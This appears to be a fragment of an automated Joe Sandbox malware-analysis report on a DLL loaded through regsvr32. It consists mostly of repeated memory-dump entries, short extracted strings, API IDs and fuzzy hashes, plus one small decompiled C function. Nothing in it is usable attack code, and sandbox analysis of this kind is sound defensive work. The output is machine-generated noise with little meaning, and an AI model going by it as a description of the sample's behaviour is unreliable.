                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hc$aYG
                                                                                                                                                                                                            • API String ID: 0-2147329803
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Ip$2/
                                                                                                                                                                                                            • API String ID: 0-2558650176
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                            • String ID: h$j-`
                                                                                                                                                                                                            • API String ID: 963392458-2572860821
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #z$UP
                                                                                                                                                                                                            • API String ID: 0-3609392360
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: )bkr$z~
                                                                                                                                                                                                            • API String ID: 0-4035444816
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: aK>$NM
                                                                                                                                                                                                            • API String ID: 0-1076587397
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: GcX$cy5X
                                                                                                                                                                                                            • API String ID: 0-3427037236
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: &$U
                                                                                                                                                                                                            • API String ID: 0-326847644
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: k' {$z5
                                                                                                                                                                                                            • API String ID: 0-3484172565
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 6$D
                                                                                                                                                                                                            • API String ID: 0-3309211938
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $$%9
                                                                                                                                                                                                            • API String ID: 0-3031553271
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #T$(Pv0
                                                                                                                                                                                                            • API String ID: 0-2531358951
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gd$s=z
                                                                                                                                                                                                            • API String ID: 0-3301279615
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: !oW!$ke&Q
                                                                                                                                                                                                            • API String ID: 0-419570616
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ?j|$P
                                                                                                                                                                                                            • API String ID: 0-615948335
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: j$[
                                                                                                                                                                                                            • API String ID: 0-3696242357
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %$aI
                                                                                                                                                                                                            • API String ID: 0-3604358270
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: + $S"
                                                                                                                                                                                                            • API String ID: 0-2880694137
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: =K$d%
                                                                                                                                                                                                            • API String ID: 0-2790768846
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #|$`
                                                                                                                                                                                                            • API String ID: 0-1687004633
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: c$j~;
                                                                                                                                                                                                            • API String ID: 0-3832213246
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: -h$W
                                                                                                                                                                                                            • API String ID: 0-4146498651
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .$fp
                                                                                                                                                                                                            • API String ID: 0-3298127435
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "$Zs
                                                                                                                                                                                                            • API String ID: 0-3922668666
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XW$s [
                                                                                                                                                                                                            • API String ID: 0-2366283936
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4V$jn(
                                                                                                                                                                                                            • API String ID: 0-2529302498
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: '$%6
                                                                                                                                                                                                            • API String ID: 0-1852427169
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: uS$J
                                                                                                                                                                                                            • API String ID: 0-437994327
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: +@$`.P
                                                                                                                                                                                                            • API String ID: 0-1189405855
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ^$R
                                                                                                                                                                                                            • API String ID: 0-3595634639
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: t^$w
                                                                                                                                                                                                            • API String ID: 0-1486493484
                                                                                                                                                                                                            • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                            • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                            • API String ID: 0-606707520
                                                                                                                                                                                                            • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                            • Instruction ID: 86876a63dec12c44d7aae430effa8a206fb00c46ce6766cb053042ec63dd81b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A223970D14709EFDB58DFA8C49A49EBBF1FF44348F40816DE80AAB290D7749A19CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                                                                                                                            				signed long long _t25;
                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                                                                                                                            				 *(_t30 + 0x10) = _t25;
                                                                                                                                                                                                            				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                                                                                                                            				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                                                                                                                                            				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                                                                                                                                            				return __rdx + 0xb;
                                                                                                                                                                                                            			}







                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                            • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ef
                                                                                                                                                                                                            • API String ID: 0-3522424648
                                                                                                                                                                                                            • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                            • Instruction ID: b32d228eac93b743e7cba170875d3d84198894b5bf3530b9917a99001ca25dc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68022874A04709EFDB58DF68C08959EBBF2FB44308F00816DE80AEB250D775DA59CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: x]!-
                                                                                                                                                                                                            • API String ID: 0-585868058
                                                                                                                                                                                                            • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                            • Instruction ID: a8b5accab82a320cce6801d2d61f344791b79fead5870e5fdbe94d52b2aee439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECD189B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B6D7749905CF54
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: }^O
                                                                                                                                                                                                            • API String ID: 0-3039680174
                                                                                                                                                                                                            • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                            • Instruction ID: 9f5bd7a8e9285169bd57ede4de6234014e05c354fdc3a0fb5c84d98b990e3271
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A17BB6502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: RH
• API String ID: 0-2975065227
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: t"
                                                                                                                                                                                                            • API String ID: 0-2131657386
                                                                                                                                                                                                            • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                            • Instruction ID: f836568a22a03c3d3739504cc3a92ee7902ea4ec0376aab0319751a06598d234
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA41F77080070D8BDF48CF64C48A0DE7FB0FB083A8F65621DE91AB6290D3B89585CF89
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gLv
                                                                                                                                                                                                            • API String ID: 0-1669999040
                                                                                                                                                                                                            • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                            • Instruction ID: 18c7b4f20c9351ad513b8ae9815dd507d73fa9e18c2db0700da68336ab01ee0f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541A2B190078E8FDF84CF64C88A4DE7BB0FB18358F104619E866A6290D3B89665CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
